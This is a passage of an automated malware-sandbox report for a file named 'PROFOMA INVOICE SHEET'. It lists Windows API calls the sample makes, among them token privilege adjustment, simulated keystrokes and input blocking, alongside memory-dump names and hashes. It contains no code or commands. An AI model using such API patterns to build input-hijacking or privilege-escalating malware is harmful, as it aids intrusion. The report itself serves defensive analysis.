                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                    • String ID:
                                    • API String ID: 577356006-0
                                    • Opcode ID: 5d88b219e42fa8e28c4e14a9199eb48e3a6386276169c10ff75e22008c9f32ad
                                    • Instruction ID: 4b1be824d3a6bc03ed886f94e54e07d00552adc31dc86106d0220117823bbc41
                                    • Opcode Fuzzy Hash: 5d88b219e42fa8e28c4e14a9199eb48e3a6386276169c10ff75e22008c9f32ad
                                    • Instruction Fuzzy Hash: 7D11BCB2410204AFD719AF54EC86DAAB7BDEB08714B24852EE05656285EB70FC81CB20
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0036D608
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0036D645
                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0036D650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: 0e6411dd87a00eac1263d4f4a5efe20fd9c878b6a6945016b8c0bd5c3d5dd692
                                    • Instruction ID: 62bfb9b1ee3e2b68315ad92d2aea69bf1337d9695d71b6e17177c173b9d91e9b
                                    • Opcode Fuzzy Hash: 0e6411dd87a00eac1263d4f4a5efe20fd9c878b6a6945016b8c0bd5c3d5dd692
                                    • Instruction Fuzzy Hash: E5116175E05228BFDB118F95DC45FAFBFBCEB45B50F108116F904E7294D6704A058BA1
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0036168C
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003616A1
                                    • FreeSid.ADVAPI32(?), ref: 003616B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: a98a995f7a766c9b62a7a6383ac5709eb41557dbd3ef302410432c55cdbe3b83
                                    • Instruction ID: d0329955a1ca397dcd28b8cf632e80fbffaf3ea9c567e2ace7e57222941eaf72
                                    • Opcode Fuzzy Hash: a98a995f7a766c9b62a7a6383ac5709eb41557dbd3ef302410432c55cdbe3b83
                                    • Instruction Fuzzy Hash: 3EF04471950308FBDB00DFE0CC89AAEBBBCEB08300F404561E900E2281E331EA048A50
                                    APIs
                                    • GetCurrentProcess.KERNEL32(003328E9,?,00324CBE,003328E9,003C88B8,0000000C,00324E15,003328E9,00000002,00000000,?,003328E9), ref: 00324D09
                                    • TerminateProcess.KERNEL32(00000000,?,00324CBE,003328E9,003C88B8,0000000C,00324E15,003328E9,00000002,00000000,?,003328E9), ref: 00324D10
                                    • ExitProcess.KERNEL32 ref: 00324D22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 623e340410d4615f4ee50cb22c8e290b559a8eba09867bc1b1edb1b8e94c9602
                                    • Instruction ID: 6dc12c0c03ac6f601723375809cce8bbb1629a483de5bced112a0d9acc6d50e8
                                    • Opcode Fuzzy Hash: 623e340410d4615f4ee50cb22c8e290b559a8eba09867bc1b1edb1b8e94c9602
                                    • Instruction Fuzzy Hash: DBE0B635010158AFCF13AF54EE4AA583B6DEB41B81F118015FC098B123CB3ADD42CA90
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?), ref: 0035D28C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID: X64
                                    • API String ID: 2645101109-893830106
                                    • Opcode ID: d9ff61f19b5a74a727c40c7afe6c7cec6274dc0b7ff0860f0a518cfd9339c172
                                    • Instruction ID: 34046a9705f2fe7bbd820bf5990f040ed018488947b7f6d16990e8ee82679b0c
                                    • Opcode Fuzzy Hash: d9ff61f19b5a74a727c40c7afe6c7cec6274dc0b7ff0860f0a518cfd9339c172
                                    • Instruction Fuzzy Hash: 61D0C9B481111DEECB95CB90DC88DDDB37CBB08305F100552F506A2500D77095488F20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                    • Instruction ID: 8ca1f75bd878d8576c2686ed8afefb26ece3e7caee616cc2d9722e8ebb81a7b4
                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                    • Instruction Fuzzy Hash: BD022C71E102299BDF15CFA9D9806ADFBF1EF48314F25816AD819EB384D731AE41CB80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable is not of type 'Object'.$p#=
                                    • API String ID: 0-163314492
                                    • Opcode ID: eda620322b4eeb32055b4c6e7e32db423a0cac39d4bf0fb6a6a461eb88fccdd6
                                    • Instruction ID: f6ba926b3efcae9774691029002cfa467463ab19533b121b8a7b4bf4407e513e
                                    • Opcode Fuzzy Hash: eda620322b4eeb32055b4c6e7e32db423a0cac39d4bf0fb6a6a461eb88fccdd6
                                    • Instruction Fuzzy Hash: F932AD70911208DBDF1ADF94C8A1BEDB7B9BF05304F214159E806AF2D2DB32AD4ACB51
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00376918
                                    • FindClose.KERNEL32(00000000), ref: 00376961
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 4b18e8bd42a6d17a22454e5e4bbd8244c378a5b56bcbbab589db0ed7baaf8d41
                                    • Instruction ID: 2d0380af36cc88eb3b2e63024fa1e5a28c86d1a9338a5ca4d6217131a56072cd
                                    • Opcode Fuzzy Hash: 4b18e8bd42a6d17a22454e5e4bbd8244c378a5b56bcbbab589db0ed7baaf8d41
                                    • Instruction Fuzzy Hash: EC11E2716146019FC711CF29C895A16BBE4FF85328F05C699F5698F7A2CB34EC05CB91
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00384891,?,?,00000035,?), ref: 003737E4
                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00384891,?,?,00000035,?), ref: 003737F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 9f845f9984832eb3ddf679344f8e9769305d92f7b376ed6e96c6c6dc9363fee4
                                    • Instruction ID: d6012b5803a6b041b99cdf8b59d7bc6f04b3701c2fe4ca8aa511f999d77f7068
                                    • Opcode Fuzzy Hash: 9f845f9984832eb3ddf679344f8e9769305d92f7b376ed6e96c6c6dc9363fee4
                                    • Instruction Fuzzy Hash: FAF0E5B16052282AEB2257668C8DFEB3BAEEFC4761F000266F509D2281D9609944C6B0
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0036B25D
                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0036B270
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: InputSendkeybd_event
                                    • String ID:
                                    • API String ID: 3536248340-0
                                    • Opcode ID: ef9afdd74bd43ac77d134c31085389da5d4305bbd7db988e47b8ce2b51730a84
                                    • Instruction ID: 98dc0ca999d19090fd413a20dd75d9cc7d6db66a9234ab8f0b7ae00714f51903
                                    • Opcode Fuzzy Hash: ef9afdd74bd43ac77d134c31085389da5d4305bbd7db988e47b8ce2b51730a84
                                    • Instruction Fuzzy Hash: 06F06D7080428DABDB068FA0C805BAEBBB4FF04305F00840AF951A5192C37982119F94
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003611FC), ref: 003610D4
                                    • CloseHandle.KERNEL32(?,?,003611FC), ref: 003610E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: 5fc1e546bdde8a9f7b5cab17287baa57a475b441ed9e867d5308cea9794f4118
                                    • Instruction ID: 4f1a819c83be2de65097d60a5096046678b8122b1538618f90d4ef186b11849c
                                    • Opcode Fuzzy Hash: 5fc1e546bdde8a9f7b5cab17287baa57a475b441ed9e867d5308cea9794f4118
                                    • Instruction Fuzzy Hash: 2DE0BF72018650AEE7262B51FC05EB777ADEB04310F14882EF5A5844B5DB62ACE0DB60
                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00336766,?,?,00000008,?,?,0033FEFE,00000000), ref: 00336998
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 2be409ba35c989abcfe51de8c37470fe6e4a8b2419a375ac771b7e249a21aef6
                                    • Instruction ID: 7901a53f09a4e26adaec799a9d75cc1c252b76739f4ce86e2bc41c17c99f77b0
                                    • Opcode Fuzzy Hash: 2be409ba35c989abcfe51de8c37470fe6e4a8b2419a375ac771b7e249a21aef6
                                    • Instruction Fuzzy Hash: 8FB11A71610609AFD716CF28C4CAB657BE0FF49364F26C658E899CF2A2C735E991CB40
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: b02b37dc13245ba3fdc1f0f6e547ef6ed1e523568e9d4e7cea91e4539f72e52c
                                    • Instruction ID: 5c651944311107612890420fa209f767f1d3418fa88ceb6be8bb608bed7f314d
                                    • Opcode Fuzzy Hash: b02b37dc13245ba3fdc1f0f6e547ef6ed1e523568e9d4e7cea91e4539f72e52c
                                    • Instruction Fuzzy Hash: 851260759002299FDB16CF59C880AEEB7F5FF48710F15819AE849EB251EB309E85CF90
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 0037EABD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: 27c6d600d32f6c657d7a9e6813dbb36a95bd73e6ffa2a304b578ef1e9a127ae8
                                    • Instruction ID: 1e2fb596d04460624608a0d69c5ba13b3a4de9cac73a7ffa2d21e8e4261fb874
                                    • Opcode Fuzzy Hash: 27c6d600d32f6c657d7a9e6813dbb36a95bd73e6ffa2a304b578ef1e9a127ae8
                                    • Instruction Fuzzy Hash: CBE01A312202049FC711EF59D814E9AF7EDAF98760F008456FC49CB291DA74A8408B91
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003203EE), ref: 003209DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 86f64141ac0f2b66d83816b6a2f952a9e95e2716ccaffaac4b80b1a617f096b2
                                    • Instruction ID: 311a25640c4a1b376b040390d529fffe228ccaef2538fce0631827240be48182
                                    • Opcode Fuzzy Hash: 86f64141ac0f2b66d83816b6a2f952a9e95e2716ccaffaac4b80b1a617f096b2
                                    • Instruction Fuzzy Hash:
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                    • Instruction ID: b4374c22cb32b19c6bf8b162b8b18559e7cdcf86c5110e074fe264bb7176ce1a
                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                    • Instruction Fuzzy Hash: 2A51557160C7795BDB3B8678B85F7FE2389BB02340F190509E982DB682CB25DE81D356
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0&=
                                    • API String ID: 0-1084027831
                                    • Opcode ID: 281c521f86069f9e0b838fd26535bba73419b264b673acfa666183de28156e37
                                    • Instruction ID: b349e7c7eee93808b61cdb238264b4798fe5b9abd916e974ffc502e6c7a0e107
                                    • Opcode Fuzzy Hash: 281c521f86069f9e0b838fd26535bba73419b264b673acfa666183de28156e37
                                    • Instruction Fuzzy Hash: 1421D8326216118BD728CF79D81367F73E9A764310F198A2EE4A7C73D0DE39A904CB90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 01db3655a91c7217887256aa444c3d0d08939edcb75296a260002984f025049a
                                    • Instruction ID: 37ea87f34e2ded5eac539506ef73e991fe197e3764f928e790658fb68f3b79e0
                                    • Opcode Fuzzy Hash: 01db3655a91c7217887256aa444c3d0d08939edcb75296a260002984f025049a
                                    • Instruction Fuzzy Hash: 05322162D29F014DD7279638C862336A64DAFB73C5F15D727E82AB5DAAEB29C4C34100
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e8dca4889f748937262fbbcc511050cb9d6726c4427e5f9eab523d72d34b4ada
                                    • Instruction ID: a2c7061f74ca90d0e2711d9ef97c16bdee04cf062ae69de061327cf77ea2d976
                                    • Opcode Fuzzy Hash: e8dca4889f748937262fbbcc511050cb9d6726c4427e5f9eab523d72d34b4ada
                                    • Instruction Fuzzy Hash: C5322D31A203058FCF2BCA68C490DBD7BA5EB49709F2AA566DC45D76A1D330DD8ADB40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a32faf88c5a7f614e15729b43561e79eb913dadd86ad899b1491f090668f39e
                                    • Instruction ID: 6adf42c708d51690759eead65aa58cdc3541c34ab757ff54153362085584c816
